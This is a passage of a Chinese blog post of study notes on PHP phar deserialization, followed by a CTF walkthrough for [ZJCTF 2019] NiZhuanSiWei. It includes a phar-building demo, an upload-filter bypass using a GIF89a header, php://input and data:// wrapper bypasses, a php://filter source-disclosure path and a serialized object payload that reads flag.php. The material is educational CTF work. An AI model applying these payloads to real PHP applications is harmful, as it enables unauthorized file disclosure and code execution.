<li><p><strong>受影响的文件操作函数</strong>：(参考 zsx师傅<a target="_blank" rel="noopener" href="https://blog.zsxsoft.com/post/38">Phar与Stream Wrapper造成PHP RCE的深入挖掘</a>)可知：<br>除了<code>所有文件函数</code>，只要是函数的实现过程直接或间接调用了<code>php_stream_open_wrapper</code>的函数，都可能触发phar反序列化漏洞（具体看zsx师傅的博客，写的很明了~）<br><img src="https://i.loli.net/2021/02/25/MT25UaKWSXCAl9i.png" srcset="/img/loading.gif" alt="源自创宇测试"></p>
</li>
<li><p>phar文件：<br>在软件中，PHAR（PHP归档）文件是一种打包格式，通过将许多PHP代码文件和其他资源（例如图像，样式表等）捆绑到一个归档文件中来实现应用程序和库的分发</p>
<ul>
<li><code>php&gt;=5.3</code>：默认开启支持<code>Phar</code>，文件状态为只读(<code>phar.readonly=on</code>)，而且使用phar文件不需要任何配置。php使用phar://伪协议来解析phar文件的内容。<br>ps：需<code>php.ini</code>中令 <code>phar.readonly=off</code>并去掉其前面的分号<code>;</code>否则无法生成phar文件</li>
</ul>
</li>
<li><p>phar文件结构：      </p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-number">1.</span> stub<br>phar文件的标志，必须以 xxx <span class="hljs-comment"><span class="hljs-keyword">__HALT_COMPILER</span>();?&gt; 结尾，否则phar不会识别此部分。xxx可以为自定义内容。</span><br><span class="hljs-comment">2. manifest</span><br><span class="hljs-comment">phar文件本质上是一种压缩文件，其中每个被压缩文件的权限、属性等信息都放在这部分。这部分会以序列化的形式存储用户自定义的meta-data，这里是漏洞利用的关键所在,正是因为meta-data是以序列化的形式存储</span><br><span class="hljs-comment">3. content</span><br><span class="hljs-comment">被压缩文件的内容，通常情况下这里是可以随意输入的</span><br><span class="hljs-comment">4. signature (可空)</span><br><span class="hljs-comment">签名，放在末尾。</span><br></code></pre></td></tr></table></figure>
</li>
<li><p>demo:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>    <br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Test</span></span>&#123;<br>    <span class="hljs-keyword">var</span> <span class="hljs-variable">$string</span>;<br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span>(<span class="hljs-params"></span>)</span>&#123;<br>        <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;Phar create done&quot;</span>;<br>    &#125;<br>&#125;<br><br>@unlink(<span class="hljs-string">&quot;test.phar&quot;</span>);<br><span class="hljs-variable">$phar</span> = <span class="hljs-keyword">new</span> Phar(<span class="hljs-string">&quot;test.phar&quot;</span>);<span class="hljs-comment">#.phar文件，(后缀名必须为phar)</span><br><span class="hljs-variable">$phar</span>-&gt;startBuffering();<br><span class="hljs-variable">$phar</span>-&gt;setStub(<span class="hljs-string">&quot;&lt;?php  __HALT_COMPILER(); ?&gt;&quot;</span>);	<span class="hljs-comment">#stub(1)</span><br><span class="hljs-comment">#检测图片头时，可以添加gif头来绕过：GIF89a</span><br><br><span class="hljs-variable">$o</span> = <span class="hljs-keyword">new</span> Test();<br><span class="hljs-variable">$o</span>-&gt;string = <span class="hljs-string">&quot;bphar&quot;</span>;<span class="hljs-comment">#类的属性</span><br><br><span class="hljs-variable">$phar</span>-&gt;setMetadata(<span class="hljs-variable">$o</span>);	<span class="hljs-comment">#将自定义的meta-data存入manifest(2)</span><br><span class="hljs-variable">$phar</span>-&gt;addFromString(<span class="hljs-string">&quot;bphar.txt&quot;</span>,<span class="hljs-string">&quot;bphar&quot;</span>); <span class="hljs-comment">#添加压缩文件(3)</span><br><span class="hljs-variable">$phar</span>-&gt;stopBuffering();	<span class="hljs-comment">#签名自动计算(4)</span><br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs awk"><br>  ![创建成功](https:<span class="hljs-regexp">//i</span>.loli.net<span class="hljs-regexp">/2021/</span><span class="hljs-number">02</span><span class="hljs-regexp">/25/</span>QIKqF6MvL9Tif7x.png)<br>  ![test.phar文件结构](https:<span class="hljs-regexp">//i</span>.loli.net<span class="hljs-regexp">/2021/</span><span class="hljs-number">02</span><span class="hljs-regexp">/25/</span>w8cvt7eCQpHMbEj.png)<br>  在使用Phar:<span class="hljs-regexp">//</span> 协议流解析Phar文件时，Meta-data中的内容都会进行反序列化<br>(也就是phar文件中的反序列化部分)<br></code></pre></td></tr></table></figure>
</li>
</ul>
</li>
<li><p>利用：</p>
<ol>
<li>上传phar文件，并借助phar://协议访问phar文件，从而将Meta-data中的内容反序列化</li>
<li>在创建时必须是phar后缀（$phar = new Phar(“exp.phar”); //.phar文件）<br>上传时为了绕过限制，则可以修改文件后缀、添加图片头从而达到上传的目的</li>
</ol>
</li>
</ul>
<h2 id="例题（data-、php-input、php-filter）"><a href="#例题（data-、php-input、php-filter）" class="headerlink" title="例题（data://、php://input、php://filter）"></a>例题（data://、php://input、php://filter）</h2><blockquote>
<p>[ZJCTF 2019]NiZhuanSiWei</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs php">源码：<br><span class="hljs-meta">&lt;?php</span>  <br><span class="hljs-variable">$text</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&quot;text&quot;</span>];<br><span class="hljs-variable">$file</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&quot;file&quot;</span>];<br><span class="hljs-variable">$password</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&quot;password&quot;</span>];<br><span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$text</span>)&amp;&amp;(file_get_contents(<span class="hljs-variable">$text</span>,<span class="hljs-string">&#x27;r&#x27;</span>)===<span class="hljs-string">&quot;welcome to the zjctf&quot;</span>))&#123;<br><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;br&gt;&lt;h1&gt;&quot;</span>.file_get_contents(<span class="hljs-variable">$text</span>,<span class="hljs-string">&#x27;r&#x27;</span>).<span class="hljs-string">&quot;&lt;/h1&gt;&lt;/br&gt;&quot;</span>;<br><span class="hljs-keyword">if</span>(preg_match(<span class="hljs-string">&quot;/flag/&quot;</span>,<span class="hljs-variable">$file</span>))&#123;<br><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;Not now!&quot;</span>;<br><span class="hljs-keyword">exit</span>(); <br>&#125;<span class="hljs-keyword">else</span>&#123;<br><span class="hljs-keyword">include</span>(<span class="hljs-variable">$file</span>);  <span class="hljs-comment">//useless.php</span><br><span class="hljs-variable">$password</span> = unserialize(<span class="hljs-variable">$password</span>);<br><span class="hljs-keyword">echo</span> <span class="hljs-variable">$password</span>;<br>&#125;<br>&#125;<br><span class="hljs-keyword">else</span>&#123;<br>highlight_file(<span class="hljs-keyword">__FILE__</span>);<br>&#125;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>考点有三：</p>
<ol>
<li><p>绕过file_get_contents()<br>a、使用php://input伪协议绕过（需开启allow_url_include）<br>​    ① 将要<code>GET</code>的参数<code>?xxx=php://input</code><br>​    ② 用<code>post</code>方法传入<code>想要file_get_contents()函数返回的值</code></p>
<p><img src="https://i.loli.net/2021/02/24/EkFIO635YwAoiTm.png" srcset="/img/loading.gif"></p>
<p> b、用data://伪协议绕过 ,<code>?text=data://text/plain,welcome to the zjctf</code><br>将url改为：<code>?xxx=data://text/plain;base64,(base64编码的内容)</code></p>
<pre><code>或    改为：`?xxx=data:text/plain,(url编码的内容)`</code></pre>
<p><img src="https://i.loli.net/2021/02/24/GD46ewrWXPJY9q2.png" srcset="/img/loading.gif"></p>
</li>
<li><p>利用php://filter获取useless.php源码<br><code>php://filter/read=convert.base64-encode/resource=useless.php</code></p>
</li>
<li><p>反序列化获取flag<br><code>password=O:4:&quot;Flag&quot;:1:&#123;s:4:&quot;file&quot;;s:8:&quot;flag.php&quot;;&#125;</code></p>
</li>
</ol>
</blockquote>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/">学习笔记</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/">学习笔记</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！</p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/02/18/%E8%BF%91%E6%9C%9F%E7%9A%84%E4%B8%80%E4%BA%9B%E8%AE%A1%E5%88%92/">
                        <span class="hidden-mobile">关于一些计划（的实施情况）</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
              <!-- Comments -->
              <article class="comments" id="comments">
                
                
  <div id="vcomments"></div>
  <script type="text/javascript">
    Fluid.utils.waitElementVisible('vcomments', function() {
      Fluid.utils.createScript('https://cdn.jsdelivr.net/npm/valine@1.4.14/dist/Valine.min.js', function () {
        new Valine({
          el: "#vcomments",
          app_id: "zjCV2oT3ti8Lyk0insYTRpLr-gzGzoHsz",
          app_key: "y4AXlgIqQsV7Enr3IFS3r6Ck",
          placeholder: "欢迎评论噢~",
          path: window.location.pathname,
          avatar: "retro",
          meta: ["nick","mail","link"],
          pageSize: "10",
          lang: "zh-CN",
          highlight: true,
          recordIP: false,
          serverURLs: "",
        });
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the
    <a target="_blank" href="https://valine.js.org" rel="nofollow noopener noopener">comments powered by Valine.</a>
  </noscript>


              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>


  
  <div class="statistics">
    
    

    
      
        <!-- LeanCloud 统计PV -->
        <span id="leancloud-site-pv-container" style="display: none">
            总访问量 
            <span id="leancloud-site-pv"></span>
             次
          </span>
      
      
        <!-- LeanCloud 统计UV -->
        <span id="leancloud-site-uv-container" style="display: none">
            总访客数 
            <span id="leancloud-site-uv"></span>
             人
          </span>
      

    
  </div>


  

  

<span id="sitetime"></span>
<script language=javascript>
	function siteTime(){
		window.setTimeout("siteTime()", 1000);
		var seconds = 1000;
		var minutes = seconds * 60;
		var hours = minutes * 60;
		var days = hours * 24;
		var years = days * 365;
		var today = new Date();
		var todayYear = today.getFullYear();
		var todayMonth = today.getMonth()+1;
		var todayDate = today.getDate();
		var todayHour = today.getHours();
		var todayMinute = today.getMinutes();
		var todaySecond = today.getSeconds();
		/* 
		Date.UTC() -- 返回date对象距世界标准时间(UTC)1970年1月1日午夜之间的毫秒数(时间戳)
		year - 作为date对象的年份，为4位年份值
		month - 0-11之间的整数，做为date对象的月份
		day - 1-31之间的整数，做为date对象的天数
		hours - 0(午夜24点)-23之间的整数，做为date对象的小时数
		minutes - 0-59之间的整数，做为date对象的分钟数
		seconds - 0-59之间的整数，做为date对象的秒数
		microseconds - 0-999之间的整数，做为date对象的毫秒数
        */
		var t1 = Date.UTC(2020,12,30,00,00,00); //北京时间2020-12-30 00:00:00
		var t2 = Date.UTC(todayYear,todayMonth,todayDate,todayHour,todayMinute,todaySecond);
		var diff = t2-t1;
		var diffYears = Math.floor(diff/years);
		var diffDays = Math.floor((diff/days)-diffYears*365);
		var diffHours = Math.floor((diff-(diffYears*365+diffDays)*days)/hours);
		var diffMinutes = Math.floor((diff-(diffYears*365+diffDays)*days-diffHours*hours)/minutes);
		var diffSeconds = Math.floor((diff-(diffYears*365+diffDays)*days-diffHours*hours-diffMinutes*minutes)/seconds);
		document.getElementById("sitetime").innerHTML=" 自Na0h将神光棒放入此地已"+/*diffYears+" 年 "+*/diffDays+" 天"+diffHours+" 小时 "+diffMinutes+" 分钟 "+diffSeconds+" 秒🌩٩(๏̯๏)۶❤ ";
	}
	siteTime();
</script>


</footer>


<!-- SCRIPTS -->

  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.0/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.6/dist/clipboard.min.js" ></script>




  <script defer src="/js/leancloud.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.11/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      var inputArea = document.querySelector("#local-search-input");
      inputArea.onclick = function () {
        searchFunc(path, 'local-search-input', 'local-search-result');
        this.onclick = null
      }
    })()
  </script>












  

  
    <!-- Google Analytics -->
    <script defer>
      window.ga = window.ga || function () { (ga.q = ga.q || []).push(arguments) };
      ga.l = +new Date;
      ga('create', 'G-MLL1PZ9RBK', 'auto');
      ga('send', 'pageview');
    </script>
    <script async src='https://www.google-analytics.com/analytics.js'></script>
  

  
    <!-- Google gtag.js -->
    <script async src="https://www.googletagmanager.com/gtag/js?id=260676474"></script>
    <script defer>
        window.dataLayer = window.dataLayer || [];
        function gtag(){dataLayer.push(arguments);}
        gtag('js', new Date());
        gtag('config', '260676474');
    </script>
  

  

  

  





<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>






<script type="text/javascript"
color="220,220,220" opacity='0.7' zIndex="-2" count="200" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js">
</script>

</body>
</html>
